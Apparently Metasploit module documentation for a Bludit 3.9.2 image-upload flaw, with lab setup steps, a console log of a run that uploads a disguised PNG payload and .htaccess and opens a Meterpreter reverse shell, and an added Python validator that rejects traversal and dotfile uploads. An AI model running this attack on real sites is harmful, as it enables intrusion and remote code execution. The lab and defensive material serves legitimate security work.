# Bludit Directory Traversal Image File Upload Vulnerability

## Description

This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by [christasa](https://github.com/christasa) in the image uploading feature. A remote user could abuse the `uuid` parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom `.htaccess` file to bypass the file extension check, and finally get remote code execution.

## Setup

1. Set up an Ubuntu box with Apache, PHP, and MySQL.
2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
3. Follow the installation guide [here](https://docs.bludit.com/en/getting-started/installation-guide).

Make sure your Apache server sets `AllowOverride All` in /etc/apache2/apache2.conf.

## Scenarios

```
msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 172.16.135.162:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run
[*] Started reverse TCP handler on 172.16.135.1:4444
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess
```
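
The behaviour in the Description depends on two things the upload handler accepts: a `uuid` value that can steer where the file is written, and an uploaded file named `.htaccess`. The following is an added example, not Bludit's code or its fix and not part of the Metasploit module, showing the server-side checks that close both; `UPLOAD_ROOT`, the identifier pattern and the extension allowlist are assumptions made for illustration.

```python
import posixpath
import re

UPLOAD_ROOT = "/srv/cms/uploads/pages"        # constructed path, not Bludit's layout
ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")    # assumed identifier format
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}  # assumed image allowlist


def safe_upload_path(uuid: str, filename: str) -> str:
    """Return the destination path, or raise ValueError for unsafe input."""
    # 1. The directory component must be a plain identifier: no separators, no dots.
    if not ID_RE.fullmatch(uuid):
        raise ValueError("uuid is not a plain identifier")
    # 2. Keep only the last path component of the client-supplied file name.
    name = posixpath.basename(filename.replace("\\", "/"))
    # 3. Refuse dotfiles, so a client can never write .htaccess or similar.
    if not name or name.startswith("."):
        raise ValueError("hidden or empty file name")
    # 4. Allowlist the extension (the check a custom .htaccess would sidestep).
    if posixpath.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    # 5. Defence in depth: the normalised result must still sit under the root.
    dest = posixpath.normpath(posixpath.join(UPLOAD_ROOT, uuid, name))
    if posixpath.commonpath([UPLOAD_ROOT, dest]) != UPLOAD_ROOT:
        raise ValueError("destination escapes upload root")
    return dest


def is_rejected(uuid: str, filename: str) -> bool:
    """True when safe_upload_path refuses the pair."""
    try:
        safe_upload_path(uuid, filename)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed inputs modelled on the behaviour described in the Description.
    samples = [
        ("a3f1c9", "photo.png"),
        ("../../tmp", "photo.png"),
        ("a3f1c9", ".htaccess"),
        ("a3f1c9", "shell.php"),
    ]
    for uuid, fname in samples:
        print(uuid, fname, "REJECTED" if is_rejected(uuid, fname) else "accepted")
```

Independently of the application checks, setting `AllowOverride None` for the upload directory makes Apache ignore any `.htaccess` file that does land there.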